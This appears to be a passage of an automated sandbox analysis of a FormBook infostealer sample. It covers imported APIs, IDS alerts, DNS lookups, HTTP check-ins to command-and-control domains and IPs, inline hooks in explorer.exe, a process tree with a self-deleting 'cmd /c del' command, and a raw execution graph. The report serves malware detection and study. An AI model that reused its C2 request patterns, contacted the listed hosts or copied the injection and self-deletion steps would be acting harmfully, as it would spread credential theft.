ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T11:09:13.337078+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49827 | 185.53.179.91 | 80 | TCP
2025-01-09T11:09:13.337078+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49827 | 185.53.179.91 | 80 | TCP
2025-01-09T11:09:13.337078+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49827 | 185.53.179.91 | 80 | TCP
2025-01-09T11:09:54.469634+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50003 | 3.33.130.190 | 80 | TCP
2025-01-09T11:09:54.469634+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50003 | 3.33.130.190 | 80 | TCP
2025-01-09T11:09:54.469634+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50003 | 3.33.130.190 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 11:08:31.953774929 CET | 192.168.2.4 | 1.1.1.1 | 0xee3c | Standard query (0) | www.6vay.boats | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:32.968591928 CET | 192.168.2.4 | 1.1.1.1 | 0xee3c | Standard query (0) | www.6vay.boats | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:33.983874083 CET | 192.168.2.4 | 1.1.1.1 | 0xee3c | Standard query (0) | www.6vay.boats | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:35.983875990 CET | 192.168.2.4 | 1.1.1.1 | 0xee3c | Standard query (0) | www.6vay.boats | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:52.063436985 CET | 192.168.2.4 | 1.1.1.1 | 0xd628 | Standard query (0) | www.ffgzgbl.xyz | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:12.765923977 CET | 192.168.2.4 | 1.1.1.1 | 0x6316 | Standard query (0) | www.suv-deals-49508.bond | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:33.273475885 CET | 192.168.2.4 | 1.1.1.1 | 0x17cb | Standard query (0) | www.imxtld.club | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:53.938158989 CET | 192.168.2.4 | 1.1.1.1 | 0x47b2 | Standard query (0) | www.energyecosystem.app | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 11:08:37.966870070 CET | 1.1.1.1 | 192.168.2.4 | 0xee3c | Server failure (2) | www.6vay.boats | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:37.966886044 CET | 1.1.1.1 | 192.168.2.4 | 0xee3c | Server failure (2) | www.6vay.boats | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:37.966895103 CET | 1.1.1.1 | 192.168.2.4 | 0xee3c | Server failure (2) | www.6vay.boats | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:37.966934919 CET | 1.1.1.1 | 192.168.2.4 | 0xee3c | Server failure (2) | www.6vay.boats | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:08:52.072493076 CET | 1.1.1.1 | 192.168.2.4 | 0xd628 | Name error (3) | www.ffgzgbl.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:12.816818953 CET | 1.1.1.1 | 192.168.2.4 | 0x6316 | No error (0) | www.suv-deals-49508.bond | | 185.53.179.91 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:54.000694990 CET | 1.1.1.1 | 192.168.2.4 | 0x47b2 | No error (0) | www.energyecosystem.app | energyecosystem.app | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 11:09:54.000694990 CET | 1.1.1.1 | 192.168.2.4 | 0x47b2 | No error (0) | energyecosystem.app | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 11:09:54.000694990 CET | 1.1.1.1 | 192.168.2.4 | 0x47b2 | No error (0) | energyecosystem.app | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
• www.suv-deals-49508.bond
• www.energyecosystem.app
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49827 | 185.53.179.91 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 11:09:12.831399918 CET | 168 | OUT | GET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1
    Host: www.suv-deals-49508.bond
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 50003 | 3.33.130.190 | 80 | 2580 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 11:09:54.006581068 CET | 167 | OUT | GET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1
    Host: www.energyecosystem.app
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 9, 2025 11:09:54.469468117 CET | 322 | IN | HTTP/1.1 200 OK
    content-type: text/html
    date: Thu, 09 Jan 2025 10:09:54 GMT
    content-length: 201
    connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 30 44 3d 41 66 68 4c 7a 4c 75 26 44 7a 72 34 54 3d 57 74 4a 6f 69 73 4d 57 79 62 6a 6d 37 56 6e 67 45 36 34 56 6a 2f 44 65 52 46 4c 45 4c 48 73 31 31 61 4a 64 41 58 6f 6b 43 35 33 69 7a 4d 65 46 4c 46 78 57 55 6a 47 44 64 36 50 36 33 75 70 36 41 61 70 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE"}</script></head></html>


                                                                                                          Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE2

Target ID: 0
Start time: 05:07:56
Start date: 09/01/2025
Path: C:\Users\user\Desktop\janacourse2.1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\janacourse2.1.exe"
Imagebase: 0xfb0000
File size: 1'796'096 bytes
MD5 hash: 9746B0E34B3A2048074CAF932A112CC1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 1
Start time: 05:07:57
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\janacourse2.1.exe"
Imagebase: 0x540000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high
Has exited: true

Target ID: 2
Start time: 05:07:57
Start date: 09/01/2025
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff72b770000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 05:07:59
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\explorer.exe"
Imagebase: 0x480000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 05:08:03
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 05:08:03
Start date: 09/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 2.6%
Dynamic/Decrypted Code Coverage: 1.2%
Signature Coverage: 3.6%
Total number of Nodes: 1524
Total number of Limit Nodes: 47
100633d 95633->95569 95636 fc1940 9 API calls 95634->95636 95639 1006346 95635->95639 95641 fc182c 95635->95641 95638 fc13b6 95636->95638 95644 fc17d4 95637->95644 95638->95635 95640 fc13ec 95638->95640 95854 102359c 82 API calls __wsopen_s 95639->95854 95640->95639 95665 fc1408 __fread_nolock 95640->95665 95851 fbaceb 23 API calls ISource 95641->95851 95850 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95644->95850 95645 fc1839 95852 fcd217 207 API calls 95645->95852 95648 100636e 95855 102359c 82 API calls __wsopen_s 95648->95855 95649 fc152f 95651 fc153c 95649->95651 95652 10063d1 95649->95652 95654 fc1940 9 API calls 95651->95654 95857 1035745 54 API calls _wcslen 95652->95857 95655 fc1549 95654->95655 95661 fc1940 9 API calls 95655->95661 95670 fc15c7 ISource 95655->95670 95656 fcfddb 22 API calls 95656->95665 95657 fc1872 95657->95628 95853 fcfaeb 23 API calls 95657->95853 95658 fcfe0b 22 API calls 95658->95665 95660 fc171d 95660->95569 95668 fc1563 95661->95668 95663 fbec40 207 API calls 95663->95665 95664 fc167b ISource 95664->95660 95848 fcce17 22 API calls ISource 95664->95848 95665->95645 95665->95648 95665->95649 95665->95656 95665->95658 95665->95663 95669 10063b2 95665->95669 95665->95670 95668->95670 95858 fba8c7 22 API calls __fread_nolock 95668->95858 95856 102359c 82 API calls __wsopen_s 95669->95856 95670->95657 95670->95664 95723 fc1940 95670->95723 95733 fb6246 95670->95733 95737 102744a 95670->95737 95793 10283da 95670->95793 95796 103958b 95670->95796 95799 102f0ec 95670->95799 95859 102359c 82 API calls __wsopen_s 95670->95859 95678->95569 95679->95569 95680->95569 95681->95569 95702 fbec76 ISource 95682->95702 95684 fbfef7 95698 fbed9d ISource 95684->95698 96163 fba8c7 22 API calls __fread_nolock 95684->96163 95685 fcfddb 22 API calls 95685->95702 95687 1004b0b 96165 102359c 82 API calls __wsopen_s 95687->96165 95688 fba8c7 22 API calls 95688->95702 95689 1004600 95689->95698 96162 fba8c7 22 API calls __fread_nolock 
95689->96162 95694 fd0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95694->95702 95696 fbfbe3 95696->95698 95700 1004bdc 95696->95700 95705 fbf3ae ISource 95696->95705 95697 fba961 22 API calls 95697->95702 95698->95569 95699 fd00a3 29 API calls pre_c_initialization 95699->95702 96166 102359c 82 API calls __wsopen_s 95700->96166 95702->95684 95702->95685 95702->95687 95702->95688 95702->95689 95702->95694 95702->95696 95702->95697 95702->95698 95702->95699 95703 1004beb 95702->95703 95704 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95702->95704 95702->95705 96160 fc01e0 207 API calls 2 library calls 95702->96160 96161 fc06a0 41 API calls ISource 95702->96161 96167 102359c 82 API calls __wsopen_s 95703->96167 95704->95702 95705->95698 96164 102359c 82 API calls __wsopen_s 95705->96164 95706->95569 95707->95588 95708->95588 95709->95588 95710->95599 95711->95601 95712->95619 95713->95619 95714->95619 95715->95606 95716->95613 95717->95619 95718->95619 95719->95619 95720->95619 95721->95619 95722->95619 95724 fc195d 95723->95724 95725 fc1981 95723->95725 95732 fc196e 95724->95732 95862 fd0242 5 API calls __Init_thread_wait 95724->95862 95860 fd0242 5 API calls __Init_thread_wait 95725->95860 95727 fc198b 95727->95724 95861 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95727->95861 95729 fc8727 95729->95732 95863 fd01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95729->95863 95732->95670 95734 fb625f 95733->95734 95735 fb6250 95733->95735 95734->95735 95736 fb6264 CloseHandle 95734->95736 95735->95670 95736->95735 95738 1027474 95737->95738 95739 1027469 95737->95739 95741 1027554 95738->95741 95743 fba961 22 API calls 95738->95743 95895 fbb567 39 API calls 95739->95895 95742 fcfddb 22 API calls 95741->95742 95782 10276a4 95741->95782 95744 1027587 95742->95744 95746 1027495 95743->95746 95745 fcfe0b 22 API calls 
95744->95745 95747 1027598 95745->95747 95748 fba961 22 API calls 95746->95748 95749 fb6246 CloseHandle 95747->95749 95750 102749e 95748->95750 95751 10275a3 95749->95751 95752 fb7510 53 API calls 95750->95752 95753 fba961 22 API calls 95751->95753 95754 10274aa 95752->95754 95756 10275ab 95753->95756 95896 fb525f 22 API calls 95754->95896 95758 fb6246 CloseHandle 95756->95758 95757 10274bf 95897 fb6350 95757->95897 95760 10275b2 95758->95760 95864 fb7510 95760->95864 95763 102754a 95908 fbb567 39 API calls 95763->95908 95766 fb6246 CloseHandle 95769 10275c8 95766->95769 95768 1027502 95768->95763 95770 1027506 95768->95770 95887 fb5745 95769->95887 95771 fb9cb3 22 API calls 95770->95771 95773 1027513 95771->95773 95907 101d2c1 26 API calls 95773->95907 95775 10275ea 95909 fb53de 27 API calls ISource 95775->95909 95776 10276de GetLastError 95778 10276f7 95776->95778 95916 fb6216 CloseHandle ISource 95778->95916 95781 10275f8 95910 fb53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95781->95910 95782->95670 95783 102751c 95783->95763 95785 1027645 95786 fcfddb 22 API calls 95785->95786 95788 1027679 95786->95788 95787 10275ff 95787->95785 95911 101ccff 95787->95911 95790 fba961 22 API calls 95788->95790 95791 1027686 95790->95791 95791->95782 95915 101417d 22 API calls __fread_nolock 95791->95915 95935 10298e3 95793->95935 95795 10283ea 95795->95670 96004 1037f59 95796->96004 95798 103959b 95798->95670 95800 fb7510 53 API calls 95799->95800 95801 102f126 95800->95801 96097 fb9e90 95801->96097 95803 102f136 95804 fbec40 207 API calls 95803->95804 95806 102f15b 95803->95806 95804->95806 95807 102f15f 95806->95807 96125 fb9c6e 22 API calls 95806->96125 95807->95670 95809 10370f5 95808->95809 95810 10370db 95808->95810 96141 1035689 95809->96141 96152 102359c 82 API calls __wsopen_s 95810->96152 95814 fbec40 206 API calls 95815 1037164 95814->95815 95816 10371ff 95815->95816 95819 10371a6 95815->95819 95825 10370ed 95815->95825 95817 1037253 95816->95817 95818 
1037205 95816->95818 95820 fb7510 53 API calls 95817->95820 95817->95825 96153 1021119 22 API calls 95818->96153 95823 1020acc 22 API calls 95819->95823 95821 1037265 95820->95821 95824 fbaec9 22 API calls 95821->95824 95827 10371de 95823->95827 95828 1037289 CharUpperBuffW 95824->95828 95825->95633 95826 1037228 96154 fba673 22 API calls 95826->96154 95831 fc1310 206 API calls 95827->95831 95832 10372a3 95828->95832 95830 1037230 96155 fbbf40 207 API calls 2 library calls 95830->96155 95831->95825 95833 10372f6 95832->95833 95834 10372aa 95832->95834 95836 fb7510 53 API calls 95833->95836 96148 1020acc 95834->96148 95837 10372fe 95836->95837 96156 fce300 23 API calls 95837->96156 95841 fc1310 206 API calls 95841->95825 95842 1037308 95842->95825 95843 fb7510 53 API calls 95842->95843 95844 1037323 95843->95844 96157 fba673 22 API calls 95844->96157 95846 1037333 96158 fbbf40 207 API calls 2 library calls 95846->96158 95848->95664 95849->95632 95850->95635 95851->95645 95852->95657 95853->95657 95854->95670 95855->95670 95856->95670 95857->95668 95858->95670 95859->95670 95860->95727 95861->95724 95862->95729 95863->95732 95865 fb7522 95864->95865 95866 fb7525 95864->95866 95865->95766 95867 fb755b 95866->95867 95868 fb752d 95866->95868 95869 ff50f6 95867->95869 95871 fb756d 95867->95871 95878 ff500f 95867->95878 95917 fd51c6 26 API calls 95868->95917 95920 fd5183 26 API calls 95869->95920 95918 fcfb21 51 API calls 95871->95918 95872 fb753d 95877 fcfddb 22 API calls 95872->95877 95875 ff510e 95875->95875 95879 fb7547 95877->95879 95881 fcfe0b 22 API calls 95878->95881 95886 ff5088 95878->95886 95880 fb9cb3 22 API calls 95879->95880 95880->95865 95882 ff5058 95881->95882 95883 fcfddb 22 API calls 95882->95883 95884 ff507f 95883->95884 95885 fb9cb3 22 API calls 95884->95885 95885->95886 95919 fcfb21 51 API calls 95886->95919 95888 fb575c CreateFileW 95887->95888 95889 ff4035 95887->95889 95891 fb577b 95888->95891 95890 ff403b CreateFileW 95889->95890 95889->95891 
95890->95891 95892 ff4063 95890->95892 95891->95775 95891->95776 95921 fb54c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95892->95921 95894 ff406e 95894->95891 95895->95738 95896->95757 95898 fb6362 95897->95898 95899 ff4a51 95897->95899 95922 fb6373 95898->95922 95932 fb4a88 22 API calls __fread_nolock 95899->95932 95902 fb636e 95902->95763 95906 101d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 95902->95906 95903 ff4a5b 95904 ff4a67 95903->95904 95933 fba8c7 22 API calls __fread_nolock 95903->95933 95906->95768 95907->95783 95908->95741 95909->95781 95910->95787 95912 101cd19 WriteFile 95911->95912 95913 101cd0e 95911->95913 95912->95785 95934 101cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95913->95934 95915->95782 95916->95782 95917->95872 95918->95872 95919->95869 95920->95875 95921->95894 95923 fb63b6 __fread_nolock 95922->95923 95924 fb6382 95922->95924 95923->95902 95924->95923 95925 ff4a82 95924->95925 95926 fb63a9 95924->95926 95928 fcfddb 22 API calls 95925->95928 95927 fba587 22 API calls 95926->95927 95927->95923 95929 ff4a91 95928->95929 95930 fcfe0b 22 API calls 95929->95930 95931 ff4ac5 __fread_nolock 95930->95931 95932->95903 95933->95904 95934->95912 95936 1029902 95935->95936 95937 10299e8 95935->95937 95938 fcfddb 22 API calls 95936->95938 95993 1029caa 39 API calls 95937->95993 95940 1029909 95938->95940 95941 fcfe0b 22 API calls 95940->95941 95942 102991a 95941->95942 95945 fb6246 CloseHandle 95942->95945 95943 10299a2 95944 1029ac5 95943->95944 95947 10299ca 95943->95947 95951 1029a33 95943->95951 95986 1021e96 95944->95986 95946 1029925 95945->95946 95949 fba961 22 API calls 95946->95949 95947->95795 95952 102992d 95949->95952 95950 1029acc 95955 101ccff 4 API calls 95950->95955 95953 fb7510 53 API calls 95951->95953 95954 fb6246 CloseHandle 95952->95954 95962 1029a3a 95953->95962 95956 1029934 95954->95956 95980 1029aa8 95955->95980 95958 fb7510 53 API calls 95956->95958 95957 1029abb 96001 101cd57 30 API calls 
